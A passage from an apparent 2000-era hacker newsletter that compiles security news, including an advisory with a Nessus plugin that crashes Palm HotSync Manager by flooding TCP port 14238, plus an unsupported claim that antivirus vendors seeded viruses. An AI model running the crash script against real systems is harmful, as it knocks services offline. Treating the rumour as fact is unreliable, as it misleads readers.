I'd be having a chat with an accountant or two before I bid."
Million dollar bones
Even the reserve price may appear high but in 1997 a T. rex was bought
for $8.36m by the Field Museum in Chicago, US. The deal on this skeleton
does include delivery from its current home in a Kansas warehouse.
However, the bones are only partly exposed from the rock blocks in which
they were found.
The 65 million-year-old fossil was discovered on a South Dakota cattle
ranch in 1992. Owner Alan Detrich says he sees nothing wrong with
auctioning off a piece of the Earth's history.
After all, he said, he spent more than $250,000 of his own money
unearthing the dinosaur. And he will give 10% of the proceeds to the
owners of the cattle ranch where the rock-encased skeleton was found, he
says.
"This auction is open to the world. If we don't have the right to (sell
the fossil), then we don't live in America. If we didn't go there and get
him, he'd still be up there."
Mr Detrich added that he does not mind if his T. rex becomes a corporate
mascot or is sold to a private collector with no intention of displaying
it publicly.
Chuck Schaff, at the Museum of Comparative Zoology at Harvard University,
said the fossil would be ideal for drawing crowds to a museum, but was
probably too expensive for most.
"It's not unethical to sell it, it's just a shame it goes to the highest
bidder," Mr Schaff says. "Some specimens do get away from scientists, but
that's life. It's sad, though."
The auction, which began on Monday, is due to close at 0100 GMT on 11
February 2000.
@HWA
42.0 HNN: Jan 21: UK to create cyber force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest
The UK National Criminal Intelligence Service (NCIS) has
been assigned £337,000 to draw up plans for
establishing a cyber crime squad. This online cyber force
will be used to combat online fraud, money laundering,
distributing pornography and information about
pedophilia, and electronic intrusions.
The Guardian Unlimited
http://www.newsunlimited.co.uk/uk_news/story/0,3604,123365,00.html
'Cyberforce' to fight
online crime
Monday January 17, 2000
A national "cyberforce" of computer
specialists is to be established by the
home office to police the internet and
combat a rising tide of online crime.
It was confirmed last night that the home
secretary, Jack Straw, has assigned
£337,000 to the UK National Criminal
Intelligence Service (NCIS) to draw up
plans for establishing a squad to counter
criminal activity on the web.
The move, which will target those using
computers for fraud, money laundering,
distributing pornography and information
about paedophilia, and hacking, follows a
three-year NCIS study of internet crime
which concluded that illegal activity on the
web, from email viruses to cyber-stalking,
is increasing as the wired population
grows.
Operation Trawler highlighted the
inadequacies of anti-computer crime
units, leading to calls for a dedicated
organisation.
The new unit is expected to include
experts in the private sector, the Inland
Revenue and police. It will also draw on
resources available through links with MI5
and GCHQ - the government agency that
eavesdrops on Britain and the world's
communications networks.
Roger Gaspar, the director of intelligence
at NCIS, and David Phillips, the chief
constable of Kent and head of the crime
committee at the Association of Chief
Police Officers are drawing up plans for
the unit, which will also make use of links
with American intelligence organisations
and the FBI. Barry McIntyre
@HWA
43.0 HNN: Jan 21: Army Holds Off Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
System Administrators at Redstone Arsenal in Alabama
are proud that they withstood the Y2K onslaught of
cyber intruders. However, they go on to admit that in
the past three months Redstone has been hit with 17
denial of service attacks of which twelve succeeded,
and that they have had three web sites breached in the
last year. (The interesting part of this article is at the
end where the administrator admits that his network
has a single point of failure.)
Government Executive Magazine
http://www.govexec.com/dailyfed/0100/012100j1.htm
January 21, 2000
DAILY BRIEFING
Army outpost held off hackers
in New Year's showdown
By Joshua Dean
jdean@govexec.com
Shortly after dark on New Year's Day, the pager on the belt of
Steve Carey, chief of information assurance at the Army's
Redstone Arsenal in Alabama, went off. The message was
alarming: a hacker was trying to crack into a critical server that
keeps track of network identities and passwords at the arsenal.
When Carey got to the arsenal's network management center,
he found the system protections had withstood the attack and all
was well. But Carey and his staff couldn't rest. Attackers
continued trying to breach the arsenal's computers and its Web
sites as the new millennium dawned.
Some other government sites were spared attacks during the
New Year's holiday, even though they had braced for the worst.
But Redstone is a particularly attractive target for high-tech
bandits.
The arsenal has technical information on 14 of the Army's top 29
weapons systems, including missiles, helicopters and
conventional aircraft. It also handles about 63 percent of the
Army's foreign military sales. This means transfers of money as
well as weapons technology. "It's big bucks," said Col. Douglas
S. Brouillette, who heads the arsenal's Intelligence and Security
Directorate.
As a result, security experts in Redstone's Local Computer
Incident Response Team (LCIRT) are constantly vigilant and in
many ways ahead of other agencies when it comes to handling
network attacks. LCIRT uses a number of computer intrusion
detection systems. But even places such as Redstone, where
computer security is a high priority, can't get all the technology
resources they need. So instead of relying entirely on technology,
the arsenal depends on people to remain alert against attacks.
"We have a high level of monitoring because we don't have all
the firewalls we need installed yet. We hope the monitoring
compensates for that," Brouillette said. "Monitoring allows us to
detect, immediately react and fix attacks until we get all the
firewalls and other security products installed."
Redstone's basic defense is to find attacks quickly in order to
stop them as they happen, he said. Contract analysts from
Intergraph Federal Systems serve with Carey on his defense
team.
Redstone needs all the help it can get, because its networks are
peppered with attacks daily. "We've had hundreds of incidents in
the last three-month period," Brouillette said. "That's 3,000 to
4,000 scans of the network."
Hackers conduct scans to try to find out what hardware and
software are present on a given network. Scans can discover
computers or even modems with open links to the Internet.
Unknown hackers who appeared to be from countries including
Bulgaria, China, Hungary, Israel, Latvia, Lithuania, Macedonia,
Poland, Portugal, Romania and Russia have scanned Redstone
over the past three months. But because hackers can make it
look as if they were on a computer in a different country, pinning
them down geographically is an imperfect science.
Once the reconnoitering is complete, hackers try to exploit
vulnerabilities and gain access to private networks and the
information stored there. Without intrusion detection systems and
expertise, network staff may never know they've been hacked.
Beyond scanning and attempted break-in, hackers can cripple
networks and servers by launching "denial-of-service" attacks.
In such incidents, intruders launch a flood of messages to a
single server, overwhelming it. Denial of service attacks have
become so commonplace that they come with colorful names,
such as Ping Flood, SMURF, SYN Flood, UDP Bomb and
WinNuke.
Over the past three months Redstone has been hit with 17 denial
of service attacks. Twelve of them succeeded.
And then there are the vandalsInternet gang members armed
with digital spray paintthat LCIRT must contend with.
"Three of our Web sites have been breached in the past 12
months," Carey said. In the successful attacks, the methods
were new to the network defenders, which meant the attackers
were able to change the Web sites. Once LCIRT members
discovered how the hackers pulled off the attacks, they went
through every base Web server to make sure vulnerabilities
were fixed.
Because of past vigilance, the New Year's vandals failed to
make a dent. LCIRT members say new at
tacks and techniques
are constantly appearing, and the only way to stop them is to
have a team monitoring the network and the logs of the intrusion
detection systems.
That's how the arsenal's defenders knew the New Year's
hackers were aiming deliberately for one of Redstone's most
sensitive servers. "If you get into that server you can go
anywhere in the installation," Brouillette said, breathing a sigh of
relief now that 2000 is well under way and his servers are intact
@HWA
44.0 HHN: Jan 24: French smart card expert goes to trial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by sian
An expert in smart card technology has been arrested
and faces up to seven years in jail, and a fine of
£500,000 after he designed a fake smart card that could
be used to defraud 'any cash terminal'. Serge Humpich
then offered the spoofed card to French banks in
exchange for £20 million. The banks accused him of
blackmail.
The UK Register
http://www.theregister.co.uk/000123-000005.html
(using some sucky html that fucks up c&p)
@HWA
45.0 HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by kingpin
We don't usually cover individual security vulnerabilities
here at HNN but this one is interesting. The Palm
HotSync Manager is vulnerable to DoS attack which may
also crash the system and possibly allow the execution
of arbitrary code. Anyone who runs HotSync Manager
over the network is a potential target of attack.
Beyond-Security's SecuriTeam
http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html
Title Palm HotSync Manager is vulnerable to Denial of Service attack
Summary
HotSync Manager provides network synchronization between the Palm Desktop
and a remote Palm PDA that is connected via the Internet. This feature is
used to backup the information from the Palm PDA to a secure location.
However, using HotSync Manager over the network exposes it to an attack,
where anyone with network connection to the station running HotSync Manager
can crash the application and possibly execute arbitrary code.
Details
Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98
Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000
Exploit:
By connecting to the HotSync Manager's TCP listening port (TCP port 14238),
and sending a large amount of data followed by a newline, it is possible to
crash the HotSync Manager.
The following Nessus Plugin can be used to test this:
#
# This script was written by Noam Rathaus <noamr@securiteam.com>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
name["english"] = "HotSync Manager Denial of Service attack";
script_name(english:name["english"]);
desc["english"] = "It is possible to cause HotSync Manager to crash by sending
a few bytes of garbage into its listening port TCP 14238.
Solution: Block those ports from outside communication
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "HotSync Manager Denial of Service attack";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
family["english"] = "Windows";
script_family(english:family["english"]);
exit(0);
}
#
# The script code starts here
#
if (get_port_state(14238))
{
sock14238 = open_sock_tcp(14238);
if (sock14238)
{
data_raw = crap(4096) + string("\n");
send(socket:sock14238, data:data_raw);
close(sock14238);
sleep(5);
sock14238_sec = open_sock_tcp(14238);
if (sock14238_sec)
{
security_warning(port:14238, data:"HotSync Manager port is open.");
}
else
{
security_hole(port:14238);
}
}
}
Additional information
3Com's Palm computing team is aware of the problem and will fix this issue in
the next release of the HotSync Manager.
@HWA
46.0 HNN: Jan 24: Viruses Cost the World $12.1 Billion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HWA Comment:
I'll say this as a RUMOUR or MYTH in order to avoid possible libel charges
but it was a well known fact that certain (very well known and established)
Anti-Virus vendor(s) ran underground BBS's (dial up bulletin boards) in the
80's and later special backdoored FTP sites in the 90's for the purpose of
virus authors to upload new viruses to be deployed into the wild so that the
AV companies could capitalize on these new 'threats'....so when I read about
costs like this I really wonder how much was premeditated by the AV companies
themselves in order to make a buck from susceptible companies and people that
refused to practice safe computing....trust noone, except maybe AVP. You can
debate this if you like but I know it is fact, I was there and had access to
these sites. - (HWA Trusted source)
From HNN http://www.hackernews.com/
contributed by nvirb
According to a recent study conducted by Computer
Economics, a California based computer consulting firm,
the world spent $12.1 billion last year in a war against
malicious self replicating code. The $12.1 Billion figure is
based on lost productivity, network downtime and the
expense involved in getting rid of the virus. (Hmmmm,
that number seems ridiculously large.)
APB News
http://www.apbnews.com/newscenter/internetcrime/2000/01/20/virus0120_01.html
Computer Viruses Cost $12 Billion in
1999
Report Tallies Business Impact of 'Economic Terrorism'
Jan. 20, 2000
By David Noack
CARLSBAD, Calif. (APBnews.com) --
Businesses around the world spent $12.1
billion last year in a war against "economic
terrorism" in the form of malicious computer
viruses, according to a new study.
Computer Economics, a computer consulting
firm here, has found that the economic impact
of virus attacks on information systems around
the world are taking a heavy financial toll on
business.
For the most part, computer security concerns have focused on hackers
trying to gain entry into a company's computer system, rifling through files
and possibly stealing sensitive and confidential information.
But viruses, especially those delivered in e-mail, are giving corporate
information technology managers something new to worry about.
Lost productivity and downtime
Samir Bhavnani, the analyst with Computer
Economics who conducted the study, said the
$12.1 billion is based on lost productivity,
network downtime and the expense involved in
getting rid of the virus.
"This form of economic terrorism is growing as
viruses are no longer the minor annoyances that they were a few years
ago," Bhavnani said. "Now they can verge on the catastrophic and cause
major predicaments for any organization."
He said for the first six months of last year, financial losses caused by
computer viruses totaled $7.6 billion.
Bhavnani said that companies must devote time to teaching their
employees "prudent workstation use."
Delivery began to change
"Simple things like refraining from downloading
unnecessary and non-work-related items from
the Internet, opening executable files sent via
e-mail or frequenting pornographic Web sites
will increase the security level and reduce the
vulnerability of valuable corporate resources,"
Bhavnani said.
A survey conducted last year by Information
Security magazine asked information
technology managers where they experienced
the most security breaches. Seventy-seven
percent said computer viruses were the No. 1
problem, followed by unauthorized access by
employees and hackers and the theft and destruction of computing
resources.
Last year, a series of malicious viruses clogged e-mail networks, crashed
computers and erased hard drives.
The way that viruses are delivered began to change. The "Bubbleboy" virus
was activated when unsuspecting users opened an infected e-mail. In the
past, computer viruses were spread through attachments, and e-mail was
generally regarded as safe.
'High-profile damage'
With computer virus alerts coming sometimes on a daily basis, security
experts say that businesses are still not taking virus prevention seriously.
"Despite all of the high-profile damage caused by viruses, organizations are
still just beginning to implement adequate security plans," said Michael
Erbschloe, vice president of research at Computer Economics.
"Additionally, many firms are reluctant to report damages because they
feel they may be identified as an easy target."
The study says that in the past three years there has been a major
programming shift as viruses have become far more malicious and are
designed specifically for destruction and damage.
The study said that computer viruses were initially designed to create a
minor annoyance. Now they are very complex and come in a multitude of
forms, and many are polymorphic, which means they change while in a
computer to avoid detection from anti-virus software.
Melissa and Explorer encouraged copycats
"The Melissa and Explorer.zip viruses acted as a catalyst in 1999," said
Erbschloe. "Organizations started to realize the severity and the malicious
intent of most new computer viruses and began to take the cries for
increased security spending more seriously."
Steven Ross, a director at Deloitte & Touche's Enterprise Risk Services
Practices, said computer viruses are having a noticeable impact on
companies.
"The first wave of viruses 10 years ago attacked at the operating system
level. The ones we see today are attacking at the application level. The
filters that come into play when you boot up aren't necessarily capturing
the things that are happening at the application level," said Ross.
He said there may only be a handful of smart computer writers, and that
there are hundreds and thousands so-called script kiddies who when
taught to program a virus can do so without much effort.
Writers rely on 'general complacency'
"There is also a general complacency. ... They are absolutely counting on
it," said Ross.
He cited an example of removing 7,500 viruses from a number of servers for
a company. When he returned the next week, there were 1,500 more
viruses.
Dan Schrader, vice president of new technology at Trend Micro, an
anti-virus software company in Silicon Valley, said the $12.1 billion figure is
"conceivable," and "I am not at all surprised by that number."
"If you want to label what the year [1999] was in technology, the first label
would be the year of the IPO, and the second label would be the year of the
computer virus. There were more serious computer virus outbreaks in any
one month of last year than we've had virtually in the entire history of
computing," said Schrader.
He said there was "tremendous innovation" among computer virus writers,
and for the first time the virus writers got it that it's "all about the Internet."
"There is lost data, lost productivity while you wait for the tech guy to come
around, and then there's the e-mail systems being shut down," Schrader
said. "One of the more common ways for companies to respond to news of
a new virus outbreak is to do a pre-emptive shutdown of their e-mail
system. ... It's the main way that computer viruses are spread."
David Noack is an APBnews.com staff writer (david.noack@apbnews.com)
@HWA
47.0 HNN: Jan 24: L0pht and @Stake Create Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Someone gets a grant or has a merger with a commercial company and
suddenly they have "SOLD OUT" become "NARQS" or the like, pure BS
The l0pht is long overdue its break in the security field, so just
chill and let them do their thang, you're just jealous you ain't got
what it takes to make the grade yourself. - Ed
From HNN http://www.hackernews.com/
contributed by Weld Pond
The recent merger of the hacker think tank L0pht Heavy
Industries with security services company @Stake has
created an immense buzz within the industry.
Unfortunately some journalists (well one actually) don't
seem to get it and have published some potentially
libelous comments regarding the merger.
ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2420340,00.html
Other writers seem to have more legitimate concerns
but it still obvious that they have not done their
research.
ZD Net
http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html
And still others actually seem to understand.
Boston Herald
http://www.bostonherald.com/bostonherald/life/net01182000.htm
CNN
http://cnn.com/TRANSCRIPTS/0001/22/stc.00.html
ABC News
http://abcnews.go.com/onair/dailynews/wkn_000122_netsecurity.html
ZDNet #1;
--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------
It gets really scary when hackers join security firms
By John Taschek, PC Week
January 16, 2000 9:00 PM PT
URL:
It's shaping up to be an interesting year, which in some cultures is not necessarily a good thing. First,
Lotus President Jeff Papows resigns, though I'm not sure I believe anything from Papows anymore.
Then Steve Jobs takes full control over at Apple, which will, of course, trigger a huge sell-off at
Apple because, as everyone knows, Jobs works best when he's a front-seat driver with a back-seat
title. Then China reportedly bans Windows 2000, presumably so that the country could develop an
indigenous operating system based on Linux. (The Chinese government denied the report.)
But by far the oddest thing to happen is that the hackers (or, as the fundamentalist technologists say,
crackers) who went by the name L0pht Heavy Industries have now become full-scale security
consultants. Does this bode ill for the nation's security, or what? Is everyone off their rocker?
I can't believe what I'm reading. I also can't believe I'm writing about it, since dealing with people
who have exhibited criminal tendencies is not a business I want to be in.
L0pht was a highly publicized group of hackers who started out cracking security systems and then,
somewhere along the line, became somewhat legitimate because they began to document what they
were doing on the L0pht.com Web site. L0pht also develops software that allows users to crack
operating system passwords in a matter of hours.
To get an idea how strange it is for a security firm to hire L0pht personnel, you only need to look at
the Attrition.org Web site, which highlights L0pht. Attrition's motto is, "We're easy to get along with
once you learn to worship us." More damning is that L0pht has also gone on record as saying that
"governments and multinational corporations are detrimental to the personal liberties on the Internet."
On the other hand, L0pht's new company, called @Stake, is a specialized professional services
company that will provide a full range of security solutions for the e-commerce operations of global
clients.
This is clearly an example of the farmer giving the fox the key to the chicken coop. I can't imagine
that any legitimate startup would actually seek out L0pht. But that's exactly what has happened, as
executives from Forrester Research, Cambridge Technology Partners and Compaq formed @Stake
specifically to provide security services to its clients. Lo and behold, the vice president of R&D at
@Stake is none other than Professor Mudge, the chief scientist at L0pht. I can just imagine Mudge
hacking and cracking to his heart's content, simply to find weaknesses at those multinational
companies, which then would become @Stake's new customers.
Of course, the tired old argument is that L0pht performs a service by detailing flaws in systems so
that companies can boost their defenses against a real, and more threatening, hacker. Hogwash,
poppycock and every other early-20th-century declarative. L0pht comprised many extremely bright
and talented people, and Mudge might have been the smartest of the bunch. But L0pht's history
shows that the group is not ethical, maintained practices that bordered on being illegal and is simply
downright scary. I wouldn't want any organization that hired the brain trust of L0pht as my security
consultant.
See @Stake's response to John Taschek's column.
Is it better to join them if you can't beat them? Write me at john_taschek@zd.com.
I encourage you to DO write him and respond to this article but do so politely, expletives and leet
talk will just make us look worse and prove his point. - Ed
-=-
ZDNet #2
--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------
L0pht-@Stake pact: Going legit, selling out or both?
By Michael Caton, PC Week
January 16, 2000 9:00 PM PT
URL: http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html
What bothers me the most about security specialist L0pht Heavy Industries becoming part of
@Stake isn't the idea of hiring hackers. It's the idea that L0pht's great, free public service is now
very much for hire.
The trend in the industry has been to give away, or at least subsidize with advertising, some
beneficial IT resources. I can think of at least a half-dozen free IT help sites that eventually hope to
make money through advertising or e-commerce. Access to security information is moving in the
other direction, however, entirely because there is so much demand and so few security experts.
L0pht has been a thorn in the side of many vendors; a quick look at its Web page, reveals a great
tweak of Microsoft. L0pht has been known to really embarrass vendors that have not moved quickly
enough to address the security holes the group finds. Access to most of the information has been
freeor, according to the L0pht site, "so that system administrators, users, and software and
hardware vendors may benefit from our knowledge, we share some of it with you."
In the past, "some" could have meant that L0pht held information back to protect us all from the less
scrupulous, but now it could be held back to help @Stake maintain a competitive advantage when
consulting. Talk about unscrupulous.
What will be as interesting will be to see how this security-for-hire model plays out when it comes to
companies such as @Stake maintaining a competitive advantage. By going fully legit and for-profit,
this could compromise relationships with hacking sources. When a security expert or hacker finds a
new exploit, is the rush going to be to share it with anyone? Not if someone else is going to make
money off it or hold it as confidential information to have a competitive advantage.
Perhaps image and rhetoric can maintain enough good will to keep sources alive, although I'm not so
sure an anarchist's mantra will convince too many people when a company's analysts bill out in the
tens of thousands of dollars per week.
In an industry where the nondisclosure agreement is as important as the business contract, I wonder
just how well the hacking community will disclose security holes it finds when under contract to
vendors. Let's face it: IT consulting companies aren't the only ones hiring hackers. Security skills can
be as useful for product development as for product deployment.
Hopefully, as @Stake contracts out to vendors, it has an escape clause that allows it to disclose
security flaws after a certain number of business days, just to keep the vendors honest. While it is
possible that L0pht will survive in spirit, the @Stake Web site, has all the polish of the best
up-and-coming dot-com company looking to strike gold. Retaining the anti-establishment spirit would
certainly keep it in the good graces of its sources.
Do you think good security info will be held hostage to profits in the future? Write me at
michael_caton@zd.com.
-=-
Boston Herald;
Cutting to the chase: Hackers join forces with security
firm to keep the world safe
Net Life/Stephanie Schorow
Tuesday, January 18, 2000
Which is a more revealing story? That in December a hacker calling
himself Maxim broke into a server at an on-line CD store and obtained
thousands of credit card numbers?
Or that when Maxim posted those numbers on a Web site from which
visitors could get them, one at a time, thousands reportedly did so?
Must we beware the hacker in the machine - or the hacker next door?
First, a look at the word ``hacker'' - it's not a synonym for
``criminal,'' just as not every locksmith is a burglar, as one hacker
told me. A hacker cracks software codes to get into a company's
network or Web page for the thrill of beating the system, not
necessarily to cause mischief. But the movie ``War Games''
transformed a bit of MIT slang for a guy who likes to create
computers into a term for someone who wants to destroy them.
In popular culture, the Evil Genius Hacker has joined the Mad Scientist
and Meglomaniac Who Wants to Rule the World as a standard
stereotype. Fox Mulder of TV's ``The X-Files'' could not chase his
aliens without illegal hacking help from the so-ugly-they're-cute Lone
Gunmen, Good Guy Hackers. Hackers get a total makeover into
leather-coated chic in ``The Matrix.''
But such stereotypes don't hold up in real life. The most recent Def
Con - the hackers' annual meet-and-defeat confab, had, according to
one on-line report, ``all the corporate professionalism of a computer
mainstream industry.'' Activists, calling themselves ``white hat
hackers,'' have formed a group dedicated to hacking into and shutting
down kiddie-porn sites.
And just two weeks ago, the famed Boston-area hacker collective -
known as the LOpht - announced its merger with a start-up security
company, @Stake. With founders hailing from Compaq and Forrester
Research, plus $10 million in venture capital, @Stake is pure pinstripe.
At LOpht, geek rules.
The news intrigued me. For years, I'd heard about LOpht's expertise,
its Web postings of key security flaws in Windows-based systems,
about its outlaws-in-good-standing image with the so-called black
hat hacker underground, and about their gizmo- and
Cheez-Its-clogged warehouse. Going by hacker handles of Mudge,
Dildog and Space Rogue, they've testified on lax computer security
before the U.S. Senate. They embodied Bob Dylan's phrase: ``to live
outside the law, you must be honest.''
When the hacker who goes only by ``Mudge'' returned my call, his
voice was more lighthearted than mysterious. For a guy who
supposedly has the ability to take down the Internet in 30 minutes,
he was cheerfully patient with a fumbling reporter's Hacking 101
questions.
What enticed LOpht to come in from the cold? Well, money, for one
thing; ``we'd been looking around for various way to get the LOpht
to fund itself,'' said Mudge. With @Stake's pledge not to market any
specific security product, take kickbacks from vendors or interfere
with LOpht's continued posting of security flaws, LOpht will be able to
remain the hacker's Consumer Reports, Mudge said.
LOpht's independence is invaluable to @Stake, said Ted Julian,
@Stake founder and vice president of marketing: ``There's an
enormous demand in the marketplace for these people.''
That's because computer security itself is transforming. As Mudge
said, ``We know how to make a closed system.'' Put up a fire wall
and keep people out. But with burgeoning e-commerce, systems have
to remain open enough to allow consumers access to key information.
Users, for example, might want to search inventories or track a
delivery. Yes, Mudge asserted, ``you absolutely can'' secure such
systems. You just need the right tools. Attorney General Janet Reno's
recent call for a national anti-cybercrime network underscores the
need for enhanced security.
Hacking is changing, too. Once the domain of code-writing
uber-nerds, it's been invaded by so-called script kiddies, young
neophytes who attack with a point and click. ``The media actually
encourages them,'' Mudge said, disgustedly. ``If you read about
someone breaking into a high profile Web page, it's `a 16-year-old,
brilliant misguided kid.' If a 16-year-old walked into a liquor store,
shot the clerk to get the money, they never say, a `brilliant juvenile
expert in spontaneous combustion.' ''
For me, the most telling aspect of the Maxim hack was that
afterwards no one I knew - even those who blew big bucks shopping
the dotcoms - seemed spooked about e-shopping. Perhaps we've
accepted a certain level of e-commerce risk. Consider: thousands of
traffic accidents occur daily, but we wouldn't ban driving. We just
want to keep the 16-year-old drivers under control. And we want
safer roads. Which makes me glad that the LOpht is still out there.
-=-
CNN;
Science and Technology Week
Pentagon Goes Ballistic With New Defense Tests; Group of
Hackers Goes Corporate; Winds of Change Stir Up New
Developments in Weather
Aired January 22, 2000 - 1:30 p.m. ET
THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS
FINAL FORM AND MAY BE UPDATED.
RICK LOCKRIDGE, GUEST HOST: The Pentagon goes ballistic with new
defense tests, a secretive group of computer hackers goes corporate, and the
winds of change stir up new developments in weather. Those stories and more
are just ahead on SCIENCE & TECHNOLOGY WEEK.
Hello and welcome. I'm Rick Lockridge in for Ann Kellan.
A test of a new high-tech U.S. defense system ended in failure this past
week. A prototype Interceptor, designed to knock out approaching missiles,
apparently sailed right past its target. Pentagon experts think they've figured
out what went wrong.
But as Jamie McIntyre reports, the failure is raising questions about the whole
program.
(BEGIN VIDEOTAPE)
JAMIE MCINTYRE, CNN MILITARY AFFAIRS CORRESPONDENT
(voice-over): From the launch of a target missile at night in California through
the launch of an Interceptor from a sunny Pacific island, Pentagon rocket
scientists thought they were looking at a slam dunk. Everything was tracking
perfectly. But as they counted down to an expected mid-space collision,
nothing, no flash: nothing but black space. They missed.
In reconstructing the failure, Pentagon officials say they believe heat sensors
the Interceptor uses to find the warm warhead failed in the crucial final six
seconds. Why they don't yet know.
It was a bitter disappointment after October's successful maiden test, but the
Clinton administration vowed to press on, insisting some misses were
inevitable.
JOE LOCKHART, WHITE HOUSE PRESS SECRETARY: Obviously, if
this were easy technology, they wouldn't have to test. They'd just go ahead
and deploy.
MCINTYRE: The $100 million test was the second of 19 planned tests of a
system designed to protect the United States from a limited missile attack by a
rogue nation. But only one more test is planned in the spring before the
Pentagon recommends whether to invest billions more for deployment of the
system by 2005.
Critics insist the failure is a wake-up call that the complex missile shield is not
ready for primetime.
TOM COLLINA, UNION OF CONCERNED SCIENTISTS: I would say it's
just another piece of evidence that's showing that you can't make a decision
this summer, that the system's moving too fast.
MCINTYRE (on camera): The Pentagon, stung by criticism that it may have
overstated its previous success, went to great lengths this time to explain
exactly what went wrong. And while insisting it can solve the technical
problems, a senior military official admitted the test schedule may be overly
ambitious.
Jamie McIntyre, CNN, the Pentagon.
(END VIDEOTAPE)
LOCKRIDGE: NASA made it official this week. The Mars Polar Lander is
dead. The spacecraft was designed to study the Martian atmosphere and dig
up soil samples. It was due to land on Mars on December 3. But just before it
entered the Martian atmosphere, it stopped sending data back to Earth, and it
hasn't been heard from since. One final attempt to contact it this past week
met with silence. Scientists say the Polar Lander may have burned up as it
descended, or it may have crashed on mars, but they'll probably never know
for sure. Two panels investigating the failure are due to report in March.
Coming up later in the show: dolphins stranded in the shallows, and the rescue
effort that helped turn things around. But first, some underground computer
hackers surface to show what's at stake when you're online.
(COMMERCIAL BREAK)
LOCKRIDGE: A mysterious hacker group that's legendary in some Internet
circles is going mainstream. The Boston-based group, called Lopht, is starting
a company to advise big business on computer security.
Our reporter Ann Kellan has known members of Lopht for two years now,
and wonders how if the new corporate ties will change their lofty goals.
(BEGIN VIDEOTAPE)
"MUDGE", LOPHT MEMBER: We decided Lopht is now going to
completely sellout, and we are going to join the mainstream.
ANN KELLAN, CNN CORRESPONDENT: He gives keynote speeches to
packed houses...
"MUDGE": If you're looking for computer security, then the Internet is not the
place to be.
KELLAN: ... is invited, along with fellow group members, to testify before the
U.S. Senate. He's a trained musician, and plays a mean guitar. He goes by the
handle "Mudge," won't reveal his name, rank or Social Security number...
"MUDGE": I don't worry have to worry about, you know, who's waiting
outside of my house when I leave in the morning.
KELLAN: ... and has been a member of a band of computer hackers called
Lopht since 1992.
UNIDENTIFIED MALE: Seven people, close quarters, on top of each other
-- it's amazing that we get can actually get along without being at each others'
throats.
KELLAN: Headquarted in a secret warehouse near Boston, the Lopht is filled
with hand-me-down equipment. Even the bathroom is wired.
"WELD POND," LOPHT MEMBER: Here's our bathroom. Normally, a
bathroom wouldn't be very exciting, but our bathroom has a Web browser.
KELLAN: There are processors and networks, from Novell to Microsoft.
UNIDENTIFIED MALE: We got it from dumpsters. We got it as, you know,
people give equipment to us.
KELLAN: And once they own it, they legally attack it, learning how each
system works, inside and out.
"WELD POND": We don't just attack Microsoft, no matter what, you know,
Microsoft might say.
KELLAN: Each member has area of expertise. "Weld Pond," programmer
and Web guru. "Brian Oblivion" knows networks. "Silicosis (ph)" deciphers
network codes. "Space Rogue" knows the inner workings of Macintosh
computers. He also publishes a daily hacker newsletter on the Web.
"SPACE ROGUE," LOPHT MEMBER: There a lot of things that go on that
affect the hacker culture and the people that are in the hacker community that
don't really get reported in the mainstream.
KELLAN: "Kingpin" is a hardware expert, started hacking when he was 7,
not always legally. He says Lopht helped set him straight.
"KINGPIN," LOPHT MEMBER: I got into trouble for some things when I
was younger, and they basically took me under their wing. They must have
thought I had some good in me.
UNIDENTIFIED MALE: Still do; we're just still trying to find it.
KELLAN: "Dill Dog" is an ace programmer. Before joining Lopht, he made
headlines in another hacker group, developing software that let's people
access computers from remote locations, for good or for bad. It ticked off the
likes of Microsoft, but if a system is vulnerable, Lopht's philosophy is to go
public with it.
"MUDGE": If you don't bring it public and if you just hand information off to
the offending company, they just want to bury it, because it's cheaper for them
to do that.
KELLAN: Considered by many the consumer advocates of the computer
world.
"KINGPIN": We know the computer industry is here to stay, and we want to
make security better. We want to make the industry better.
KELLAN: In the hacker world, blue hairs mingle with crew cuts and criminals
with feds, the cops and robbers attend the same conventions, to learn from
each other -- where computer vulnerabilities are, where thieves can break in
and steel everything, from bank accounts to medical records.
KELLAN (on camera): How vulnerable are all the systems out there?
(LAUGHTER)
UNIDENTIFIED MALE: Toys can be hacked.
KELLAN (voice-over): The Lopht has been an exclusive hacker playground.
And now this band of hackers is going corporate, moving to white-walled
offices money, getting money to buy new equipment, a place where they can
do more good, says "Mudge."
As far as their old stomping grounds...
"MUDGE": The luxurious labs will still exist there for sometime, I'm sure,
but...
UNIDENTIFIED MALE: We still can't tell you where you it is.
"MUDGE": Even the Lopht folks are sitting there going, we love this place, but
boy, we can make something so much better.
KELLAN: The move is good, and he'll stay casual and keep his personal life
private, he says. But will success change Lopht's goals?
UNIDENTIFIED MALE: One thing we always said about Lopht, if it stops
being fun, then it's not Lopht, then it's work.
"KINGPIN": It's just so wonderful to figure out how the world works around
you, and especially when it doesn't.
UNIDENTIFIED MALE: It is a family, that's what it is.
KELLAN: For SCIENCE & TECHNOLOGY WEEK, this is Ann Kellan.
(END VIDEOTAPE)
LOCKRIDGE: The Lopht members say their security expertise is particularly
